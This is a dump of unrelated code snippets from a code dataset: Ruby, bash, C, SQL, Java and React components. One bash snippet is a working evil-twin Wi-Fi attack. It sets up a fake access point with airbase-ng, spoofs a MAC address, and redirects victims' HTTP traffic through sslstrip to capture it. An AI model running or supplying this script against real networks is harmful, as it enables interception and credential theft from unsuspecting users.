text stringlengths 1 1.05M |
|---|
def area_of_triangle(a, b, c)
# calculate the semi-perimeter
s = (a + b + c) / 2
# calculate the area
area = Math.sqrt(s * (s - a) * (s - b) * (s - c))
puts "The area of the triangle is #{area}"
end |
#!/usr/bin/env bash
# (C) Sergey Tyurin 2022-04-28 19:00:00
# Disclaimer
##################################################################################################################
# You running this script/function means you will not blame the author(s)
# if this breaks your stuff. This script/function is provided AS IS without warranty of any kind.
# Author(s) disclaim all implied warranties including, without limitation,
# any implied warranties of merchantability or of fitness for a particular purpose.
# The entire risk arising out of the use or performance of the sample scripts and documentation remains with you.
# In no event shall author(s) be held liable for any damages whatsoever
# (including, without limitation, damages for loss of business profits, business interruption,
# loss of business information, or other pecuniary loss) arising out of the use of or inability
# to use the script or documentation. Neither this script/function,
# nor any part of it other than those parts that are explicitly copied from others,
# may be republished without author(s) express written permission.
# Author(s) retain the right to alter this disclaimer at any time.
##################################################################################################################
################################################################################################
# NB! This update script will work correctly only if RNODE_GIT_COMMIT="master" in env.sh ! ! !
# In other case, you have to update node manually ! ! !
################################################################################################
echo
echo "#################################### Full update Script ########################################"
echo "INFO: $(basename "$0") BEGIN $(date +%s) / $(date +'%F %T %Z')"
SCRIPT_DIR=`cd "$(dirname "${BASH_SOURCE[0]}")" && pwd -P`
source "${SCRIPT_DIR}/env.sh"
exitVar=0
shopt -s nocasematch
if [[ ! -z ${Enable_Node_Autoupdate} || -n ${Enable_Node_Autoupdate} ]]
then
if [[ ${Enable_Node_Autoupdate} != "true" ]]
then
exitVar=1
else
myNodeAutoupdate=1
fi
fi
if [[ ! -z ${Enable_Scripts_Autoupdate} || -n ${Enable_Scripts_Autoupdate} ]]
then
if [[ ${Enable_Scripts_Autoupdate} != "true" ]]
then
exitVar=2
else
myScriptsAutoupdate=1
fi
fi
if [[ ! -z ${newReleaseSndMsg} || -n ${newReleaseSndMsg} ]]
then
if [[ ${newReleaseSndMsg} != "true" ]]
then
exitVar=3
else
myNewReleaseSndMsg=1
fi
fi
shopt -u nocasematch
#===========================================================
# Get scripts update info
Custler_Scripts_local_commit="$(git --git-dir="${SCRIPT_DIR}/../.git" rev-parse HEAD 2>/dev/null)"
Custler_Scripts_remote_commit="$(git --git-dir="${SCRIPT_DIR}/../.git" ls-remote 2>/dev/null | grep 'HEAD'|awk '{print $1}')"
if [[ -z $Custler_Scripts_local_commit ]];then
echo "###-ERROR(line $LINENO): Cannot get LOCAL Scripts commit!"
exit 1
fi
if [[ -z $Custler_Scripts_remote_commit ]];then
echo "###-ERROR(line $LINENO): Cannot get REMOTE Scripts commit!"
exit 1
fi
###############################################################
#===========================================================
if [[ "$Custler_Scripts_local_commit" != "$Custler_Scripts_remote_commit" ]]
then
echo '---WARN: Set Enable_Node_Autoupdate to true in env.sh for automatically security updates!! If you fully trust me, you can enable autoupdate scripts in env.sh by set variable "Enable_Scripts_Autoupdate" to "true"'
if [[ $myNewReleaseSndMsg -eq 1 ]]
then
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "$Tg_Warn_sign"+'WARN: Security info! **NEW** release arrived! But Enable_Node_Autoupdate setted to false and you should upgrade node manually as fast as you can! If you fully trust me, you can enable autoupdate scripts in env.sh by set variable "Enable_Scripts_Autoupdate" to "true"' 2>&1 > /dev/null
fi
fi
# Update env.sh for new security update
# ok, here we use force to set autoupdate, strannen'ko =)
# sed -i.bak 's/Enable_Autoupdate=.*/Enable_Node_Autoupdate=true # will automatically update rnode, rconsole, tonos-cli etc../' "${SCRIPT_DIR}/env.sh"
# sed -i.bak '/Enable_Node_Autoupdate/a Enable_Scripts_Autoupdate=false # Updating scripts. NB! Change it to true if you fully trust me ONLY!!' "${SCRIPT_DIR}/env.sh"
###############################################################
#===========================================================
# Update scripts, if enabled, or send msg re update
if [[ ${myScriptsAutoupdate} -eq 1 ]]
then
if [[ "$Custler_Scripts_local_commit" == "$Custler_Scripts_remote_commit" ]];then
echo "---INFO: Scripts is up to date"
else
if $Enable_Scripts_Autoupdate ;then
echo "---INFO: SCRIPTS going to update from $Custler_Scripts_local_commit to new commit $Custler_Scripts_remote_commit"
if [[ $myNewReleaseSndMsg -eq 1 ]]; then
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "$Tg_Warn_sign INFO: SCRIPTS going to update from $Custler_Scripts_local_commit to new commit $Custler_Scripts_remote_commit" 2>&1 > /dev/null
fi
Remote_Repo_URL="$(git remote show origin | grep 'Fetch URL' | awk '{print $3}')"
echo "---INFO: Update scripts from repo $Remote_Repo_URL"
#=======================================
mkdir -p ${HOME}/Custler_tmp
cp -f ${SCRIPT_DIR}/env.sh ${HOME}/Custler_tmp/
cp -f ${SCRIPT_DIR}/TlgChat.json ${HOME}/Custler_tmp/
cp -f ${SCRIPT_DIR}/RC_Addr_list.json ${HOME}/Custler_tmp/
git reset --hard
git pull --ff-only
cp -f ${HOME}/Custler_tmp/env.sh ${SCRIPT_DIR}/
cp -f ${HOME}/Custler_tmp/TlgChat.json ${SCRIPT_DIR}/
cp -f ${HOME}/Custler_tmp/RC_Addr_list.json ${SCRIPT_DIR}/
#=======================================
cat ${SCRIPT_DIR}/Update_Info.txt
echo
echo "---INFO: SCRIPTS updated. Files env.sh TlgChat.json RC_Addr_list.json keeped."
if [[ $myNewReleaseSndMsg -eq 1 ]]; then
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "$Tg_CheckMark $(cat ${SCRIPT_DIR}/Update_Info.txt)" 2>&1 > /dev/null
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "$Tg_CheckMark INFO: SCRIPTS updated. Files env.sh TlgChat.json RC_Addr_list.json keeped." 2>&1 > /dev/null
fi
else
echo '---WARN: Scripts repo was updated. Please check it and update by hand. If you fully trust me, you can enable autoupdate scripts in env.sh by set variable "Enable_Scripts_Autoupdate" to "true"'
if [[ $myNewReleaseSndMsg -eq 1 ]]; then
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "$Tg_Warn_sign"+'WARN: Scripts repo was updated. Please check it and update. If you fully trust me, you can enable autoupdate scripts in env.sh by set variable "Enable_Scripts_Autoupdate" to "true"' 2>&1 > /dev/null
fi
fi
fi
fi
#===========================================================
# Update NODE
${SCRIPT_DIR}/Update_Node_to_new_release.sh
#################################################################
# NB!! This section shoul be run once only with rnode commit 5494f43cf80e071f6e10257ef4901568d10b2385 only
Node_local_commit="$(git --git-dir="$RNODE_SRC_DIR/.git" rev-parse HEAD 2>/dev/null)"
if [[ ! -f ${SCRIPT_DIR}/rnode_commit_5494f43_DB_Restored ]] && [[ ${Node_local_commit} == "5494f43cf80e071f6e10257ef4901568d10b2385" ]];then
echo "${Tg_Warn_sign}---WARN: Node going to RESTORE DataBase. It is once for commit 5494f43. Approx ONE hour the node will looks like DOWN and UNSYNCED!"
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "${Tg_Warn_sign}---WARN: Node going to RESTORE DataBase. It is once for commit 5494f43. Approx ONE hour the node will looks like DOWN and UNSYNCED!" 2>&1 > /dev/null
#===============================
sudo service ${ServiceName} stop
jq ".restore_db = true" ${R_CFG_DIR}/config.json > ${R_CFG_DIR}/config.json.tmp
mv -f ${R_CFG_DIR}/config.json.tmp ${R_CFG_DIR}/config.json
sudo service ${ServiceName} start
${SCRIPT_DIR}/wait_for_sync.sh
jq ".restore_db = false" ${R_CFG_DIR}/config.json > ${R_CFG_DIR}/config.json.tmp
mv -f ${R_CFG_DIR}/config.json.tmp ${R_CFG_DIR}/config.json
#===============================
touch ${SCRIPT_DIR}/rnode_commit_5494f43_DB_Restored
echo "${Tg_Warn_sign}---INFO: DB restored. Node should be SYNCED!"
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "${Tg_Warn_sign}---INFO: DB restored. Node should be SYNCED!" 2>&1 > /dev/null
fi
#################################################################
echo "+++INFO: $(basename "$0") FINISHED $(date +%s) / $(date +'%F %T %Z')"
echo "================================================================================================"
exit 0
|
<reponame>leshiguang/LZUISDK
//
// LSDScreenDisplay.h
// LSBluetooth-Library
//
// Created by lifesense on 16/8/1.
// Copyright © 2016年 Lifesense. All rights reserved.
//
#import "LSDBaseModel.h"
#import "LSConst.h"
@interface LSDScreenDisplay : LSDBaseModel
@property (nonatomic, assign) ScreenWay screeWay;
@end
|
SELECT * FROM people
WHERE address = '10 Main Street'; |
#!/bin/bash
blaze run \
--compilation_mode=opt \
--define=PYTYPE=TRUE \
--symlink_prefix=/ -- \
experimental/users/daeyun/jaxnerf/train \
--logtostderr \
--data_dir="/cns/lu-d/home/daeyun/shapenet/v2/train/00002/" \
--train_dir="/cns/lu-d/home/daeyun/checkpoints/shapenet/v2/0002/" \
--config=jaxnerf/configs/shapenet_base \
"$@"
|
<reponame>muthukumaravel7/armnn
var _cl_convolution2d_workload_8cpp =
[
[ "ClConvolution2dWorkloadValidate", "_cl_convolution2d_workload_8cpp.xhtml#acd1146eb56f1473a0bf4561bcc1d1529", null ]
]; |
def fast_operation(n):
result = (n * (n + 1)) // 2
return result |
# Copyright (c) 2010 The Chromium OS Authors. All rights reserved.
# Copyright (c) 2013 The CoreOS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# The GCC package includes both its libraries and the compiler.
# In prod images we only need the shared libraries.
extract_prod_gcc() {
local root_fs_dir="$1"; shift
local gcc=$(portageq-${BOARD} best_version "${BOARD_ROOT}" sys-devel/gcc)
local pkg="$(portageq-${BOARD} pkgdir)/${gcc}.tbz2"
if [[ ! -f "${pkg}" ]]; then
die "Binary package missing: $pkg"
fi
# Normally GCC's shared libraries are installed to:
# /usr/lib/gcc/x86_64-cros-linux-gnu/$version/*
# Instead we extract them to plain old /usr/lib
qtbz2 -O -t "${pkg}" | \
sudo tar -C "${root_fs_dir}" -xj \
--transform 's#/usr/lib/.*/#/usr/lib/#' \
--wildcards './usr/lib/gcc/*.so*'
package_provided "${gcc}"
}
create_prod_image() {
local image_name="$1"
local disk_layout="$2"
local update_group="$3"
local base_pkg="$4"
if [ -z "${base_pkg}" ]; then
echo "did not get base package!"
exit 1
fi
info "Building production image ${image_name}"
local root_fs_dir="${BUILD_DIR}/rootfs"
local image_contents="${image_name%.bin}_contents.txt"
local image_packages="${image_name%.bin}_packages.txt"
local image_licenses="${image_name%.bin}_licenses.txt"
start_image "${image_name}" "${disk_layout}" "${root_fs_dir}" "${update_group}"
# Install minimal GCC (libs only) and then everything else
set_image_profile prod
extract_prod_gcc "${root_fs_dir}"
emerge_to_image "${root_fs_dir}" "${base_pkg}"
run_ldconfig "${root_fs_dir}"
write_packages "${root_fs_dir}" "${BUILD_DIR}/${image_packages}"
write_licenses "${root_fs_dir}" "${BUILD_DIR}/${image_licenses}"
extract_docs "${root_fs_dir}"
# Assert that if this is supposed to be an official build that the
# official update keys have been used.
if [[ ${COREOS_OFFICIAL:-0} -eq 1 ]]; then
grep -q official \
"${root_fs_dir}"/var/db/pkg/coreos-base/coreos-au-key-*/USE \
|| die_notrace "coreos-au-key is missing the 'official' use flag"
fi
# clean-ups of things we do not need
sudo rm ${root_fs_dir}/etc/csh.env
sudo rm -rf ${root_fs_dir}/etc/env.d
sudo rm -rf ${root_fs_dir}/var/db/pkg
# Move the ld.so configs into /usr so they can be symlinked from /
sudo mv ${root_fs_dir}/etc/ld.so.conf ${root_fs_dir}/usr/lib
sudo mv ${root_fs_dir}/etc/ld.so.conf.d ${root_fs_dir}/usr/lib
sudo ln --symbolic ../usr/lib/ld.so.conf ${root_fs_dir}/etc/ld.so.conf
# Add a tmpfiles rule that symlink ld.so.conf from /usr into /
sudo tee "${root_fs_dir}/usr/lib64/tmpfiles.d/baselayout-ldso.conf" \
> /dev/null <<EOF
L+ /etc/ld.so.conf - - - - ../usr/lib/ld.so.conf
EOF
finish_image "${image_name}" "${disk_layout}" "${root_fs_dir}" "${image_contents}"
upload_image -d "${BUILD_DIR}/${image_name}.bz2.DIGESTS" \
"${BUILD_DIR}/${image_contents}" \
"${BUILD_DIR}/${image_packages}" \
"${BUILD_DIR}/${image_name}"
}
|
#!/usr/bin/env bash
function grep_word_from_git_commits_since_last_tag() {
local commits=$(git log --oneline $(git describe --tags --abbrev=0 @^)..@ --grep="$1" 2> /dev/null)
if [ $? -eq 128 ]; then
echo 2
elif [ -z "$commits" ];
then
echo 0
else
echo 1
fi
}
function get_version() {
##
# TODO: Comment out this code when packages are stable
# if [ `grep_word_from_git_commits_since_last_tag "BREAKING CHANGE"` -gt 0 ]
# then
# echo "major"
# elif [ `grep_word_from_git_commits_since_last_tag "Feat"` -gt 0 ]
# The packages are still unstable so we update only 0.x.x versions (minor and patch)
# however breaking changes are still documented in the changelog
if [ `grep_word_from_git_commits_since_last_tag "BREAKING CHANGE"` -gt 0 ] && [ `grep_word_from_git_commits_since_last_tag "Feat"` -gt 0 ]
then
echo "minor"
else
echo "patch"
fi
}
get_version
|
#!/bin/sh
#
# main run
#
if [ -f {{ .Values.config.zoneJar.path }}/zone.jar ]
then
echo
echo "CENM: starting up zone process ..."
echo
set -x
java -jar {{ .Values.config.zoneJar.path }}/zone.jar \
--user "{{ .Values.database.user }}" \
--password "{{ .Values.database.password }}" \
--url "{{ .Values.database.url }}" \
--driver-class-name "{{ .Values.database.driverClassName }}" \
--jdbc-driver "{{ .Values.database.jdbcDriver }}" \
--enm-listener-port "{{ .Values.listenerPort.enm }}" \
--admin-listener-port "{{ .Values.listenerPort.admin }}" \
--auth-host "{{ .Values.cenmServices.authName }}.{{ .Values.metadata.namespace }}" \
--auth-port "{{ .Values.cenmServices.authPort }}" \
--auth-trust-store-location ./DATA/trust-stores/corda-ssl-trust-store.jks \
--auth-trust-store-password "SSL_TRUSTSTORE" \
--auth-issuer "http://test" \
--auth-leeway 5 \
--run-migration="{{ .Values.database.runMigration }}" \
--tls=true \
--tls-keystore=./DATA/key-stores/corda-ssl-identity-manager-keys.jks \
--tls-keystore-password="IDMAN_SSL" \
--tls-truststore=./DATA/trust-stores/corda-ssl-trust-store.jks \
--tls-truststore-password="SSL_TRUSTSTORE" \
--verbose
EXIT_CODE=${?}
else
echo "Missing zone jar file in {{ .Values.config.zoneJar.path }} directory:"
ls -al {{ .Values.config.zoneJar.path }}
EXIT_CODE=110
fi
|
<gh_stars>10-100
#ifndef SIGNAL_HPP_
#define SIGNAL_HPP_
//============================================================================
// Name :
// Author : Avi
// Revision : $Revision: #7 $
//
// Copyright 2009-2020 ECMWF.
// This software is licensed under the terms of the Apache Licence version 2.0
// which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
// In applying this licence, ECMWF does not waive the privileges and immunities
// granted to it by virtue of its status as an intergovernmental organisation
// nor does it submit to any jurisdiction.
//
// Description : During destruction will un-block SIGCHILD and then reblock
// During job generation we want to avoid being notified of
// of child process termination.
// We want to control when child process termination is handled
// Collaboration: System.hpp
//============================================================================
namespace ecf {
class Signal {
private:
Signal(const Signal&) = delete;
const Signal& operator=(const Signal&) = delete;
public:
Signal();
/// UNBLOCK SIGCHLD at start of destructor
/// BLOCK SIGCHLD and the end of the destructor
/// During the gap in between handle process termination
~Signal();
static void block_sigchild();
static void unblock_sigchild();
};
}
#endif
|
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
int main() {
int player1, player2;
// seed random number generator
srand(time(0));
printf("Let's play rock, paper, scissors\n");
printf("-------------------------------\n");
// Player 1
printf("Player 1 enters choice: ");
scanf("%d", &player1);
// Player 2
player2 = rand() % 3 + 1;
printf("Player 2 chooses %d\n", player2);
// Determine winner
if (player1 == player2) {
printf("It's a tie!\n");
} else if (player1 == 1 && player2 == 3) {
printf("Paper beats rock. Player 1 wins.\n");
} else if (player1 == 2 && player2 == 1) {
printf("Paper beats rock. Player 1 wins.\n");
} else if (player1 == 3 && player2 == 2) {
printf("Scissors beats paper. Player 1 wins.\n");
} else {
printf("Player 2 wins.\n");
}
return 0;
} |
<reponame>bizmaercq/eda-reporting
select *
from acvw_all_ac_entries
where ac_no in ('452101000','451101000')
and nvl(ib,'X')<>'Y'
and trn_dt between '01/04/2014' and '31/05/2014'
|
. ./common.sh
cabal configure > /dev/null
cabal exec echo this string
|
import React, { useEffect, useState, useCallback, Suspense } from "react";
import GitHub from "github-api";
import config from "./config";
import "./App.css";
import UserDetails from "./UserDetails";
import LoginSearch from "./LoginSearch";
import CircularProgress from "@material-ui/core/CircularProgress";
const RepoList = React.lazy(() => import("./RepoList"));
const gh = new GitHub({
token: config.token
});
function App() {
const [isLoading, setIsLoading] = useState(false);
const [user, setUser] = useState(null);
const [repos, setRepos] = useState([]);
useEffect(() => {}, []);
const onSearch = useCallback(async value => {
setIsLoading(true);
const user = gh.getUser(value);
try {
const userResponse = await user.getProfile();
const reposResponse = await user.listRepos();
setUser(userResponse.data);
setRepos(
reposResponse.data
.filter(r => r.owner.login === value)
.map(r => ({
id: r.id,
name: r.name,
language: r.language
}))
);
} catch (error) {
setUser(null);
setRepos([]);
alert(`User '${value}' not found`);
} finally {
setIsLoading(false);
}
}, []);
return (
<div className="App">
<header className="App-header">
<p>
<code>GitHub Browser</code>
</p>
</header>
<LoginSearch onSearch={onSearch} />
{isLoading && (
<div>
<CircularProgress />
</div>
)}
{!isLoading && user != null && (
<UserDetails user={user} onReposClick={null} />
)}
<Suspense fallback={<CircularProgress style={{ marginTop: "1rem" }} />}>
{!isLoading && repos.length > 0 && <RepoList repos={repos} />}
</Suspense>
</div>
);
}
export default App;
|
<gh_stars>1-10
const mongoose = require('mongoose')
const RegistrationSchema = new mongoose.Schema({
date: () => Date.now(),
approved: Boolean,
owner: String,
eventTitle: String,
eventPrice: String,
userEmail: String,
eventDate: String,
user: {
type: mongoose.Schema.Types.ObjectId,
ref: 'User',
},
event: {
type: mongoose.Schema.Types.ObjectId,
ref: 'Event',
},
})
module.exports = mongoose.model(
'Registration',
RegistrationSchema,
'registrations'
)
|
#!/bin/bash
#____[start of config]_________________________
# these two values can be overwritten using
# arguments to the command
essid="mylinksys"
channel="11"
subnet="192.168.100.0"
startip="192.168.100.100"
endip="192.168.100.200"
broadcast="192.168.100.255"
router="192.168.100.1"
netmask="255.255.255.0"
dns="8.8.8.8"
#____[end of config]___________________________
# override the default essid if one is provided
if [[ ! -z ${1} ]]; then
essid="${1}"
fi
# override the default channel if one is provided
if [[ ! -z ${2} ]]; then
channel="${2}"
fi
function clear_iptables {
iptables --flush
iptables --table nat --flush
iptables --table nat --delete-chain
iptables --delete-chain
}
function cleanup {
echo "* cleaning up"
killall sslstrip
killall dhcpd3
rm -rf /tmp/dhcpd
rm -f /tmp/dhcpd.conf
ifconfig at0 down
killall airbase-ng
clear_iptables
echo "* end of script"
exit 0
}
trap cleanup INT
echo "* creating dummy dhcpd.conf"
cat << EOF > /tmp/dhcpd.conf
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet ${subnet} netmask ${netmask} {
option subnet-mask ${netmask};
option broadcast-address ${broadcast};
option routers ${router};
option domain-name-servers ${dns};
range ${startip} ${endip};
}
EOF
echo "* starting airbase-ng essid ${essid} on channel ${channel}"
airbase-ng -e "${essid}" -q -c ${channel} mon0 &
sleep 3
echo "* spoofing MAC address for at0"
ifconfig at0 down
macchanger -a at0
echo "* bringing up at0 and setting route"
ifconfig at0 up
ifconfig at0 ${router} netmask ${netmask}
route add -net ${subnet} netmask ${netmask} gw ${router}
echo "* starting dhcpd3"
mkdir -p /tmp/dhcpd
touch /tmp/dhcpd/dhcpd.leases
chown -R dhcpd:dhcpd /tmp/dhcpd
dhcpd3 -q -cf /tmp/dhcpd.conf -pf /tmp/dhcpd/dhcpd.pid -lf /tmp/dhcpd/dhcpd.leases at0
echo "* setting up forwarding rules"
clear_iptables
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
mygw=$(grep nameserver /etc/resolv.conf | head -1 | cut -d" " -f2)
echo "* using ${mygw} as gateway"
iptables --table nat --append PREROUTING --protocol udp --dport 53 -j DNAT --to ${mygw}
iptables -t nat -D PREROUTING 1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
ssslog="sslstrip.${RANDOM}"
echo "* starting sslstrip and logging results to ${ssslog}"
sslstrip -f -k -w ${ssslog} &
echo "* setup complete, now we wait for victims!"
while :; do
sleep 60
done;
|
// Licensed under the Apache License, Version 2.0 (the "License"); you may not
// use this file except in compliance with the License. You may obtain a copy of
// the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
// WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
// License for the specific language governing permissions and limitations under
// the License.
import FauxtonAPI from '../../../core/api';
import app from '../../../app';
import PropTypes from 'prop-types';
import React from 'react';
import GeneralComponents from '../../components/react-components';
import IndexEditorComponents from '../../documents/index-editor/components';
import Analyzer from './Analyzer';
const DesignDocSelector = IndexEditorComponents.DesignDocSelector;
export default class SearchIndexEditor extends React.Component {
static defaultProps = {
isCreatingIndex: true,
blur: function () { },
isLoading: true
};
static propTypes = {
isLoading: PropTypes.bool,
isCreatingIndex: PropTypes.bool,
database: PropTypes.object.isRequired,
saveDoc: PropTypes.object.isRequired,
newDesignDocName: PropTypes.string,
blur: PropTypes.func,
setSearchIndexName: PropTypes.func.isRequired,
searchIndexFunction: PropTypes.string.isRequired,
saveSearchIndex: PropTypes.func.isRequired,
selectDesignDoc: PropTypes.func.isRequired,
updateNewDesignDocName: PropTypes.func.isRequired
};
updateSearchIndexName = (e) => {
this.props.setSearchIndexName(e.target.value);
};
saveIndex = (e) => {
e.preventDefault();
// pass off validation work to the individual form sections
if (!this.designDocSelector.validate() || !this.analyzer.validate()) {
return;
}
if (!this.props.searchIndexName.trim()) {
FauxtonAPI.addNotification({
msg: 'Please enter the index name.',
type: 'error',
clear: true
});
return;
}
const dDocNameClean = this.props.saveDoc.id.replace(/_design\//, '');
const encodedPartKey = this.props.partitionKey ? encodeURIComponent(this.props.partitionKey) : '';
const url = FauxtonAPI.urls('search', 'fragment', encodeURIComponent(this.props.database.id), encodedPartKey,
encodeURIComponent(dDocNameClean), encodeURIComponent(this.props.searchIndexName));
this.props.saveSearchIndex(this.props.saveDoc, {
isCreatingIndex: this.props.isCreatingIndex,
indexName: this.props.searchIndexName,
designDocs: this.props.designDocs,
database: this.props.database,
indexFunction: this.getIndexFunction(),
analyzerInfo: this.analyzer.getInfo(),
lastSavedSearchIndexName: this.props.lastSavedSearchIndexName,
lastSavedDesignDocName: this.props.lastSavedDesignDocName
}, url);
};
getIndexFunction = () => {
return this.searchIndexEditor.getValue();
};
getDesignDocList = () => {
return this.props.designDocs.map(function (doc) {
return doc.id;
});
};
getCancelLink() {
const encodedDatabase = encodeURIComponent(this.props.database.id);
const encodedPartitionKey = this.props.partitionKey ? encodeURIComponent(this.props.partitionKey) : '';
if (!this.props.lastSavedDesignDocName || this.props.isCreatingIndex) {
return '#' + FauxtonAPI.urls('allDocs', 'app', encodedDatabase, encodedPartitionKey);
}
const encodedDDoc = app.utils.getSafeIdForDoc(this.props.lastSavedDesignDocName);
const encodedIndex = encodeURIComponent(this.props.lastSavedSearchIndexName);
return '#' + FauxtonAPI.urls('search', 'showIndex', encodedDatabase,
encodedPartitionKey, encodedDDoc, encodedIndex);
}
render() {
if (this.props.isLoading) {
return (
<div className="search-index-page-loading">
<GeneralComponents.LoadLines />
</div>
);
}
// If failed to load
if (!this.props.database) {
return null;
}
const pageHeader = this.props.isCreatingIndex ? 'New Search Index' : 'Edit Search Index';
const btnLabel = this.props.isCreatingIndex ? 'Create Document and Build Index' : 'Save Document and Build Index';
return (
<form className="form-horizontal search-query-save" id="search-index">
<h3 className="simple-header">{pageHeader}</h3>
<DesignDocSelector
ref={node => this.designDocSelector = node}
designDocLabel="Save to design document"
designDocList={this.getDesignDocList()}
isDbPartitioned={this.props.isDbPartitioned}
newDesignDocName={this.props.newDesignDocName}
newDesignDocPartitioned={this.props.newDesignDocPartitioned}
selectedDesignDocName={this.props.ddocName}
selectedDesignDocPartitioned={this.props.ddocPartitioned}
onSelectDesignDoc={this.props.selectDesignDoc}
onChangeNewDesignDocName={this.props.updateNewDesignDocName}
onChangeNewDesignDocPartitioned={this.props.updateNewDesignDocPartitioned}
docLink={app.helpers.getDocUrl('DOC_URL_DESIGN_DOCS')} />
<div className="control-group">
<label htmlFor="search-name">Index name</label>
<input type="text" id="search-name" value={this.props.searchIndexName} onChange={this.updateSearchIndexName} />
</div>
<GeneralComponents.CodeEditorPanel
id={'search-function'}
className="ace-editor-section"
ref={node => this.searchIndexEditor = node}
title={"Search index function"}
allowZenMode={false}
docLink={app.helpers.getDocUrl('SEARCH_INDEXES')}
defaultCode={this.props.searchIndexFunction}
blur={this.props.blur} />
<Analyzer ref={node => this.analyzer = node} {...this.props}/>
<div className="control-group">
<button id="save-index" className="btn btn-primary save" onClick={this.saveIndex}>
<i className="icon fonticon-ok-circled" />{btnLabel}
</button>
<a href={this.getCancelLink()} className="index-cancel-link">Cancel</a>
</div>
</form>
);
}
}
|
#!/usr/bin/env bash
export CUDA_VISIBLE_DEVICES=0
echo "Using GPU $CUDA_VISIBLE_DEVICES..."
python ../train.py \
--model_name "dl4mt" \
--reload \
--config_path "../configs/dl4mt_config.yaml" \
--log_path "./log" \
--saveto "./save/" \
--use_gpu |
#!/bin/bash
for MAJOR in {0..2}
do
for MINOR in {0..9}
do
for PATCH in {0..9}
do
./deploy.sh ${MAJOR}.${MINOR}.${PATCH}
done
done
done
./deploy.sh 3.0.0
# On first execution, it is necessary to fix the maven-metadata.xml file
cd ../repo/test/x
NORM="maven-metadata.xml"
LOCAL="maven-metadata-local.xml"
if [ ! -L $LOCAL ]; then
echo "Fixing Maven metadata file"
mv ${LOCAL} ${NORM}
ln -s ${NORM} ${LOCAL}
mv ${LOCAL}.md5 ${NORM}.md5
ln -s ${NORM}.md5 ${LOCAL}.md5
mv ${LOCAL}.sha1 ${NORM}.sha1
ln -s ${NORM}.sha1 ${LOCAL}.sha1
fi
|
<gh_stars>0
package com.testforth.words;
import com.testforth.Forth;
/**
* @author Dmitry
*/
public abstract class AbstractWord {
private final String name;
public AbstractWord() {
this.name = null;
}
public AbstractWord(String name) {
this.name = name;
}
public abstract void execute(Forth forth);
public String getName(){
return name;
}
}
|
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.TableData;
import java.util.HashMap;
import java.util.LinkedHashMap;
import java.util.Map;
public class DataProcessor {
private Map<String, Object> merge(JsonObject values, JsonObject values1) {
LinkedHashMap<String, Object> hashMap = new LinkedHashMap<>(values.getMap());
hashMap.putAll(values1.getMap());
return ImmutableMap.copyOf(hashMap);
}
public static Map<String, Map<TableData, TableData>> toTableToTableDependenciesDataMap(Map<TableData, TableData> dataMap) {
final Map<String, Map<TableData, TableData>> map = new HashMap<>();
map.put("dependencies", dataMap);
return map;
}
} |
package com.ssafy.sub.repo;
import java.util.List;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.stereotype.Repository;
import com.ssafy.sub.dto.Contest;
@Repository
public interface ContestRepository extends JpaRepository<Contest, Long> {
Contest findFirstByOrderByIdDesc();
List<Contest> findAllByOrderByIdDesc();
Contest findById(int cid);
}
|
#!/bin/bash -x
stack clean && stack build --profile && stack exec -- fx-exe trade-practice +RTS -xc
|
import React from "react"
import Image from "gatsby-image"
import { Link } from "gatsby"
import { graphql, useStaticQuery } from "gatsby"
import SocialLinks from "../constants/socialLinks"
const query = graphql`
{
file(relativePath: { eq: "macska-2.png" }) {
childImageSharp {
fluid {
...GatsbyImageSharpFluid
}
}
}
}
`
const Hero = () => {
const {
file: {
childImageSharp: { fluid },
},
} = useStaticQuery(query)
return (
<header className="hero">
<div className="section-center hero-center">
<article className="hero-info">
<div>
<div className="underline"></div>
<h2>A Királylány és a Cicája</h2>
<h4>Szerepjátékos mese gyerekeknek</h4>
<h5><i>Hol volt, hol nem volt.<br></br><br></br>
Volt egyszer egy nagyon kedves kiscica,
<br></br><br></br>
- a Királylány cicája -<br></br><br></br>
akinek kedvenc időtöltése;<br></br> a palota felfedezése volt.
<br></br><br></br>
Ezen kívül szeretett még;<br></br> pihe puha párnáján pihengetni <br></br>
és az ablakpárkányon nézelődni.
</i></h5>
<Link to="/blog" className="btn">
Történt egyszer hát...
</Link>
<SocialLinks />
</div>
</article>
<Image fluid={fluid} className="hero-img" />
</div>
</header>
)
}
export default Hero
|
var $ = require("jquery"),
ko = require("knockout"),
browser = require("core/utils/browser"),
devices = require("core/devices"),
themes = require("ui/themes");
require("../../../helpers/executeAsyncMock.js");
require("integration/knockout");
require("bundles/modules/parts/widgets-all");
var LABEL = ".dx-field-label",
VALUE = ".dx-field-value";
var fieldsetFixtureTemplate = ' <div id="markup" style="width: 980px"> \
<div class="dx-fieldset" id="widgetsOnFields"> \
<div class="dx-field" id="switchOnField"> \
<div class="dx-field-label" data-bind="text: \'Switch:\'"></div> \
<div class="dx-field-value" data-bind="dxSwitch: {}"></div> \
</div> \
<div class="dx-field" id="checkboxOnField"> \
<div class="dx-field-label" data-bind="text: \'CheckBox:\'"></div> \
<div class="dx-field-value" data-bind="dxCheckBox: {}"></div> \
</div> \
<div class="dx-field" id="textboxOnField"> \
<div class="dx-field-label" data-bind="text: \'TextBox: \'"></div> \
<div class="dx-field-value" data-bind="dxTextBox: {}"></div> \
</div> \
<div class="dx-field" id="autocompleteOnField"> \
